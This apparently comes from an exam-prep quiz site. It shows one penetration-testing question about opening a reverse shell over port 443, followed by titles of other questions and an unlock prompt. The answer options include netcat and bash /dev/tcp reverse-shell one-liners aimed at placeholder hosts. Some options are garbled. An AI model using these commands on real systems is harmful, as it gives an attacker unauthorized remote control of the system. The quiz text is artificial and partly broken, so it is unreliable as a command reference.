A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A) perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
B) ssh superadmin@<DESTINATIONIP> -p 443
C) nc -e /bin/sh <SOURCEIP> 443 nc -e /bin/sh <SOURCEIP> 443
D) bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Correct Answer:
Verified
Q19: A penetration tester is performing ARP spoofing
Q20: A company requested a penetration tester review
Q21: A penetration tester is testing a banking
Q22: A penetration tester has been assigned to
Q23: While monitoring WAF logs, a security analyst
Q25: Which of the following would be the
Q26: A penetration tester is required to perform
Q27: A penetration tester was able to retrieve
Q28: A penetration tester has a full shell
Q29: Consider the following PowerShell command: powershell.exe IEX
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents